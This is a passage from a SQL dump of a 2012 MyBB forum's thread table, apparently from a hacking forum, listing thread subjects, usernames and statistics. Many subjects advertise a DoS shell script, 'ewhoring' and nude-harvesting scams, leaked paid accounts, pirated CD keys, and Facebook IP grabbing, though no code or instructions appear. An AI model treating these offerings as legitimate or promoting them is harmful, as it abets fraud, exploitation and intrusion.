'0', '67', 'HoverCatz', '1350545423', '5288', '1350906105', 'iTzIpod', '82', '75', '16', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('946', '19', '[Junk]Delete the dam stars :P', '0', '0', '0', '222', 'Exposé', '1350546805', '5293', '1350556466', 'VirtualLegend', '228', '19', '5', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('959', '9', 'How to make $50+ / Day with AdFoc or Adfly', '0', '0', '0', '62', 'R?????zo?', '1350594167', '5405', '1352117967', 'sirchamp', '53', '41', '9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('948', '74', 'MINECRAFT world download', '0', '0', '0', '257', 'XxTREYZxX', '1350554401', '5336', '1350788296', 'XxTREYZxX', '257', '32', '13', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('999', '67', '[Guide] How To Setup A PHP DoS (Shell) Script', '0', '0', '0', '5', 'Timmy', '1350703914', '5650', '1350726684', 'R?????zo?', '62', '6', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('950', '35', 'Which theme do you like better?', '0', '0', '0', '222', 'Exposé', '1350558730', '5349', '1350594591', 'iTzIpod', '82', '13', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('949', '72', 'mw3 hack', '0', '0', '0', '257', 'XxTREYZxX', '1350555713', '5339', '1350770820', 'VirtualLegend', '228', '11', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('951', '71', 'L33thacking Minecraft Server', '0', '10', '0', '228', 'VirtualLegend', '1350563758', '5363', '1352230628', 'VirtualLegend', '228', '90', '21', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('952', '34', 'A nice clean signature tutorial', '0', '9', '0', '2', 'Apathy', '1350564320', '5366', '1350608349', 'Exposé', '222', '21', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('953', '34', '| [ Newbie Guide ] Photoshop Site\'s For Beginners | [ Very Helpful ] |', '0', '0', '0', '228', 'VirtualLegend', '1350564502', '5367', '1350616951', 'iTzIpod', '82', '12', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('954', '35', '/\\ New Signature | Rate My Graphics !!! /\\', '0', '0', '0', '228', 'VirtualLegend', '1350572880', '5371', '1350601220', 'Exposé', '222', '25', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('961', '61', '??$$[CAN NEVER BE SATURATED] How To Earn $50\\Week! ??', '0', '0', '0', '62', 'R?????zo?', '1350594919', '5425', '1350675250', 'iTzIpod', '82', '6', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('962', '61', '$100/month Ebook', '0', '0', '0', '62', 'R?????zo?', '1350595031', '5427', '1350595031', 'R?????zo?', '62', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('963', '17', '??SIEGRIED\'S EWHORE METHOD ??', '0', '0', '0', '62', 'R?????zo?', '1350595119', '5430', '1350857998', 'R?????zo?', '62', '19', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('955', '75', 'saints row 2 cheats', '0', '0', '0', '257', 'XxTREYZxX', '1350592621', '5384', '1350592621', 'XxTREYZxX', '257', '3', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('956', '75', 'Halo tips,tricks and cheats :O', '0', '0', '0', '257', 'XxTREYZxX', '1350593169', '5385', '1350774318', 'VirtualLegend', '228', '5', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('957', '9', '| [ Get ] My Mobile Business In A Box | Start Your Own Mobile Business |', '0', '0', '0', '228', 'VirtualLegend', '1350593317', '5386', '1350633843', 'R?????zo?', '62', '34', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('958', '73', 'subway surfers', '0', '17', '0', '257', 'XxTREYZxX', '1350593440', '5387', '1350610028', 't3h jok3r', '1', '7', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('965', '61', '?Free Unlimited Battlefield 3 Limited Edition Codes?', '0', '0', '0', '62', 'R?????zo?', '1350595450', '5439', '1350595450', 'R?????zo?', '62', '4', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('960', '61', '[24-7 Traffic Bot] Adf.ly | Adfoc.us | LinkBucks | Traffic Exchange | All in One Bot!', '0', '0', '0', '62', 'R?????zo?', '1350594377', '5410', '1350594377', 'R?????zo?', '62', '3', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('981', '4', 'Whatsup Holmes.', '0', '0', '0', '278', 'Yoess', '1350600629', '5480', '1350648080', 'NXK', '61', '27', '9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('964', '19', '[Junk][UPDATED] L33T Hacking Skype Resolver', '0', '0', '0', '214', 'Rave™', '1350595218', '5433', '1352011206', 't3h jok3r', '1', '32', '7', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('966', '61', '[99$] Lots of money for anything FAST! [LEAKED]', '0', '0', '0', '62', 'R?????zo?', '1350595588', '5441', '1351749644', 'VirtualLegend', '228', '8', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('967', '9', '[Free]Awesome Monetizing, and SEO eBooks Collections [Free]WORTH 1000$', '0', '0', '0', '62', 'R?????zo?', '1350595699', '5443', '1350597230', 'VirtualLegend', '228', '8', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('968', '61', '[Ebook] [HOT] Get Any Girls Nudes You Want [HOT] [Ebook]', '0', '0', '0', '62', 'R?????zo?', '1350595749', '5444', '1350680617', 'R?????zo?', '62', '10', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('969', '9', 'UNSATURATED Method - Start Earning Money NOW on 75% AUTOPILOT - $50-100 Per DAY', '0', '0', '0', '62', 'R?????zo?', '1350595842', '5447', '1350596353', 'VirtualLegend', '228', '6', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('972', '16', 'Social Engineering Package', '0', '0', '0', '62', 'R?????zo?', '1350596435', '5453', '1350633583', 'R?????zo?', '62', '9', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('970', '61', 'Free Premium Ebook Bundle', '0', '0', '0', '62', 'R?????zo?', '1350595970', '5448', '1350595970', 'R?????zo?', '62', '4', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('971', '9', 'EASY $250 EACH DAY | \"The Webmaster Method\" | Instant paypal money, no wait', '0', '0', '0', '62', 'R?????zo?', '1350596153', '5449', '1350633759', 'R?????zo?', '62', '17', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('980', '43', '50,000 CD KEYS OF PC GAMES', '0', '0', '0', '62', 'R?????zo?', '1350597412', '5466', '1350906029', 'R?????zo?', '62', '21', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('973', '19', '[Junk]New HF Logo?', '0', '0', '0', '214', 'Rave™', '1350596533', '5454', '1350647984', 'NXK', '61', '21', '7', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('974', '61', 'Get Abs Sitting at your Computer in 2 weeks!', '0', '0', '0', '62', 'R?????zo?', '1350596609', '5455', '1350755549', 'R?????zo?', '62', '6', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('975', '7', 'how do i insert a pic', '0', '0', '0', '257', 'XxTREYZxX', '1350596627', '5456', '1350613327', 'XxTREYZxX', '257', '22', '7', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('976', '71', 'Halo 4', '0', '0', '0', '257', 'XxTREYZxX', '1350596963', '5459', '1351130681', 'XxTREYZxX', '257', '11', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('977', '14', '[FREE] VPN Every 24 Hours [FREE]', '0', '0', '0', '62', 'R?????zo?', '1350596999', '5460', '1350596999', 'R?????zo?', '62', '4', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('978', '73', 'IOS vs ANDROID', '0', '0', '0', '257', 'XxTREYZxX', '1350597127', '5461', '1350799430', 'XxTREYZxX', '257', '15', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('979', '14', '4200 Checked HTTP Proxy Servers (L1/L2/L3)', '0', '0', '0', '62', 'R?????zo?', '1350597128', '5462', '1350597128', 'R?????zo?', '62', '3', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('983', '47', 'MC PREMIUM GIVE AWAY', '0', '0', '0', '257', 'XxTREYZxX', '1350606401', '5495', '1350834979', 'iTzIpod', '82', '44', '13', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('982', '7', 'GREED', '0', '0', '0', '257', 'XxTREYZxX', '1350605140', '5489', '1350609293', 't3h jok3r', '1', '24', '8', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('985', '7', 'World\'s Longest Email Address', '0', '0', '0', '205', 'mothered', '1350621213', '5534', '1350706587', 'mothered', '205', '25', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('986', '24', 'What VM do you use and why?', '0', '0', '0', '205', 'mothered', '1350621475', '5535', '1350650166', 'R?????zo?', '62', '8', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('997', '14', 'Discovery Channel - Track Me If You Can 2010', '0', '0', '0', '5', 'Timmy', '1350700870', '5646', '1352186259', 'p420', '9', '20', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('987', '13', '[TUT] Using Metasploit to harvest all emails of a website', '0', '0', '0', '258', 'PiXEL^OG', '1350630128', '5542', '1350735519', 'PiXEL^OG', '258', '25', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('988', '12', '[TUT] Watch +18 Youtube Videos Without an Account', '0', '0', '0', '258', 'PiXEL^OG', '1350630423', '5543', '1351541340', 'iTzIpod', '82', '20', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('989', '68', 'Free Proxy script , Make your own Proxy browsing site like Hidemyass!!!', '0', '0', '0', '258', 'PiXEL^OG', '1350630514', '5544', '1352025622', 'PiXEL^OG', '258', '19', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('990', '12', 'How to send free anonymous SMS to your friends mobile phone from you\'re PC', '0', '0', '0', '258', 'PiXEL^OG', '1350630641', '5545', '1350710838', 'PiXEL^OG', '258', '18', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('991', '14', 'VPN Accounts With Guide :)', '0', '0', '0', '62', 'R?????zo?', '1350650722', '5592', '1352572115', 'Triple H', '4', '11', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('992', '17', '[GUIDE] Verifying a PayPal Account FREE+ANONYMOUSLY', '0', '0', '0', '62', 'R?????zo?', '1350650947', '5593', '1350654913', 'R?????zo?', '62', '16', '2', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('993', '12', 'Most complete guide to be anonymous', '0', '0', '0', '62', 'R?????zo?', '1350651294', '5595', '1351608864', 'Mac Miller', '302', '19', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('994', '18', 'Getting IP\'s of Facebook contacts! [TUT]', '0', '0', '0', '62', 'R?????zo?', '1350651631', '5596', '1351218811', 'p420', '9', '13', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('995', '16', 'How do you get PID\'s?', '0', '0', '0', '62', 'R?????zo?', '1350664827', '5606', '1350679449', 'R?????zo?', '62', '11', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('996', '19', '[Junk]1000 PREMIUM ACCOUNTS!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!', '0', '0', '0', '257', 'XxTREYZxX', '1350676921', '5622', '1350684281', 'VirtualLegend', '228', '10', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('998', '12', 'Port Scanning Tutorial', '0', '0', '0', '5', 'Timmy', '1350703537', '5649', '1350850750', 'XxTREYZxX', '257', '6', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1004', '54', '[20 OKT]Brazzers,Bangbros,RK,...and more,all checked and working.', '0', '17', '0', '255', 'sbhshroy2', '1350708713', '5670', '1350724622', 'R?????zo?', '62', '3', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1005', '54', '[20 oct] realitykings,ma.brazzers and many more active acounts for 20 oct. 2012', '0', '17', '0', '255', 'sbhshroy2', '1350709115', '5672', '1350724515', 'R?????zo?', '62', '2', '1', '', 